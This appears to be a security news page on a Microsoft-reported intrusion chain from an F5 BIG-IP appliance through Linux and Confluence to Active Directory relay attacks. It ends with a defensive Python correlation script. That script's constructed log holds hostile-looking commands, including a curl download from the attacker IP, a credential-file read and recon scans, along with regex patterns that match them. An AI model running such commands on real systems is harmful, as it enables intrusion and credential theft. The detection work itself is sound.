F5 BIG-IP Breach Led to Linux Pivot, Confluence RCE, and AD Relay Attempts
Microsoft reported a multi-stage intrusion that began with the compromise of an internet-facing F5 BIG-IP appliance and expanded into broader enterprise access. The attacker used the edge device to obtain SSH access to an internal Linux host, then carried out reconnaissance with tools including Nmap, gowitness, and other open-source utilities. Microsoft said the actor also downloaded a custom scanner, detected as HackTool:Linux/MalPack.B, from 206.189.27[.]39, and used the Linux foothold to identify an unpatched internal Atlassian Confluence server.
The attacker exploited Confluence for remote code execution, shifted payload staging to an FTP server on the initial Linux host after other delivery methods were blocked, and extracted credentials from Confluence configuration files. Those credentials were then used in attempts to move into Windows identity infrastructure through relay-style attacks against Active Directory, including Kerberos relay activity and exploitation of CVE-2025-33073, while the actor also tested SSL/TLS exposure with testssl. Microsoft said the case shows how end-of-life edge appliances, unpatched internal applications, and weak identity protections can combine into a single attack chain spanning network appliances, Linux systems, enterprise applications, and domain services.

How this story unfolded
Nine events, listed from the most recent confirmed update back to the earliest known activity.
Microsoft publishes analysis and hardening recommendations
On May 22, 2026, Microsoft published its analysis of the multi-stage Linux intrusion and warned that end-of-life edge appliances, unpatched internal applications, and weak identity protections can combine into enterprise compromise. It recommended treating internet-facing edge devices as Tier-0 assets, urgently patching internal web applications such as Confluence, hardening against NTLM/Kerberos relay, and enabling Defender protections on Linux servers.
SSL/TLS weaknesses probed with testssl during later-stage activity
Microsoft observed the actor running testssl (testssl.sh, an open-source script that enumerates a server's supported protocol versions, cipher suites and known TLS weaknesses) as part of the intrusion. This is a further round of assessment of internal services, carried out while the compromise was underway.
Actor attempts AD relay attacks and exploits CVE-2025-33073
Using the stolen credentials, the threat actor attempted relay-style authentication attacks against Active Directory, including Kerberos relay activity and exploitation of CVE-2025-33073, a Windows SMB client elevation-of-privilege flaw in the NTLM reflection family that Microsoft patched in June 2025. The activity marked a shift from system compromise toward identity-focused domain attacks.
Credentials stolen from Confluence configuration files
Following access to Confluence, the actor extracted credentials from Confluence configuration files. Those credentials were then used to support further movement toward identity infrastructure.
Payloads staged through FTP after delivery attempts were blocked
Microsoft said the actor used an FTP server on the initially compromised Linux host to stage payload delivery after other delivery methods were blocked. This reflects an adaptation in tooling and delivery to maintain progress in the intrusion.
Unpatched internal Confluence server identified and exploited
The attacker discovered an unpatched internal Atlassian Confluence server and exploited it for remote code execution. This gave the actor another internal execution point and expanded the compromise.
Internal reconnaissance conducted from compromised Linux host
From the internal Linux host, the actor performed broad reconnaissance using tools including Nmap and gowitness to map systems and identify additional targets. Microsoft also observed the download of a custom scanner detected as HackTool:Linux/MalPack.B from 206.189.27[.]39.
Actor uses F5 foothold to access internal Linux host via SSH
After compromising the edge appliance, the actor leveraged it to obtain SSH access to an internal Linux system and pivot from the perimeter into the internal environment. This marked the transition from edge-device compromise to internal network access.
Threat actor compromises internet-facing F5 BIG-IP appliance
Microsoft reported that a threat actor initially gained access through an internet-facing F5 BIG-IP edge appliance, establishing the foothold that began the intrusion chain. The blog does not specify when the compromise occurred.
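Seen from the Linux hosts, the middle of this chain is a sequence of ordinary commands that only become suspicious together: a port scanner and a screenshot tool run from an application server, a download from 206.189.27[.]39, an FTP daemon appearing on a host that never served FTP, and a read of the Confluence configuration file. The per-host correlation below is an added example written for this page, not detection content from Microsoft. The log format, hostnames, users and command lines are constructed; the tool names beyond Nmap, gowitness and testssl (curl, wget and the FTP daemons) are assumptions; and the two-stage threshold and 24-hour window are tuning choices, not values from the report.

```python
"""
Per-host correlation of the Linux-side stages described on this page:
reconnaissance tooling, download of the scanner from 206.189.27.39, an FTP
daemon started for payload staging, and reads of the Confluence config file.
Added example; the log lines, hosts and users below are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

STAGING_IP = "206.189.27.39"  # indicator from the Microsoft report (defanged on the page)

# Stage name -> pattern applied to the command line.  curl/wget and the FTP
# daemon names are assumptions; Nmap, gowitness and testssl are from the page.
STAGE_RULES = [
    ("recon_tooling", re.compile(r"(^|/|\s)(nmap|gowitness|testssl(\.sh)?)(\s|$)")),
    ("scanner_download", re.compile(r"(^|/|\s)(curl|wget)(\s|$).*" + re.escape(STAGING_IP))),
    ("ftp_staging", re.compile(r"(^|/|\s)(vsftpd|proftpd|pure-ftpd)(\s|$)|pyftpdlib")),
    ("confluence_config_read", re.compile(r"confluence\.cfg\.xml")),
]

# Constructed process-execution log format: timestamp host user quoted command.
LINE_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd="(?P<cmd>.*)"$')

# Constructed sample.  lnx-app01 plays the initial Linux foothold, lnx-conf01
# the Confluence server, lnx-build02 a build box with a lone benign scan.
SAMPLE_LOG = """\
2026-05-18T09:12:04Z host=lnx-app01 user=svc-web cmd="nmap -sS -p 22,80,443,8090 10.20.0.0/24"
2026-05-18T09:40:51Z host=lnx-app01 user=svc-web cmd="gowitness scan file -f hosts.txt"
2026-05-18T10:05:17Z host=lnx-app01 user=svc-web cmd="curl -o /tmp/.s http://206.189.27.39/scan"
2026-05-18T13:22:09Z host=lnx-app01 user=root cmd="vsftpd /tmp/vsftpd.conf"
2026-05-18T14:01:33Z host=lnx-conf01 user=confluence cmd="cat /var/atlassian/application-data/confluence/confluence.cfg.xml"
2026-05-18T14:30:02Z host=lnx-conf01 user=confluence cmd="testssl.sh --quiet dc01.corp.example:636"
2026-05-18T08:00:00Z host=lnx-build02 user=ci cmd="nmap -sV localhost"
not a log line
"""


def parse_line(line):
    """Return (timestamp, host, user, cmd), or None for lines that do not fit the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ts, m["host"], m["user"], m["cmd"]


def classify(cmd):
    """Names of every stage whose rule matches this command line."""
    return [name for name, rx in STAGE_RULES if rx.search(cmd)]


def correlate(lines, window_seconds=24 * 3600):
    """
    Group stage hits per host and report hosts where at least two distinct
    stages fall inside one window.  Returns {host: [stages in time order]};
    hosts with a single stage (a lone nmap from a build box) are suppressed.
    """
    hits = defaultdict(list)  # host -> [(ts, stage)]
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, host, _user, cmd = parsed
        for stage in classify(cmd):
            hits[host].append((ts, stage))

    alerts = {}
    for host, events in hits.items():
        events.sort()
        best = []
        # Slide a window over each start event and keep the richest distinct chain.
        for i, (t0, _) in enumerate(events):
            stages = []
            for t, s in events[i:]:
                if (t - t0).total_seconds() > window_seconds:
                    break
                if s not in stages:
                    stages.append(s)
            if len(stages) > len(best):
                best = stages
        if len(best) >= 2:
            alerts[host] = best
    return alerts


if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_LOG.splitlines()).items():
        print(f"{host}: {' -> '.join(stages)}")
```

The constructed sample yields two alerts: the foothold host with recon, download and FTP staging, and the Confluence server with the config read followed by testssl. The build box's single scan is dropped by the threshold, which is the point of correlating by host rather than alerting on each tool name; the cost is that a read of confluence.cfg.xml on its own goes unreported, so on a Confluence server that stage deserves its own lower-severity rule.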
Sources
Five references tracked.
Hackers Exploit F5 BIG-IP Appliance to Gain SSH Access and Pivot Into Enterprise Linux Networks (cybersecuritynews.com)
From edge appliance to enterprise compromise: Multi-stage Linux intrusion via F5 and Confluence (malware.news, Malware Analysis, News and Indicators)
From edge appliance to enterprise compromise: Multi-stage Linux intrusion via F5 and Confluence (Microsoft Security Blog, microsoft.com)
CISA: Hackers abuse F5 BIG-IP cookies to map internal servers (bleepingcomputer.com)
Hackers use F5 BIG-IP malware to stealthily steal data for years (bleepingcomputer.com)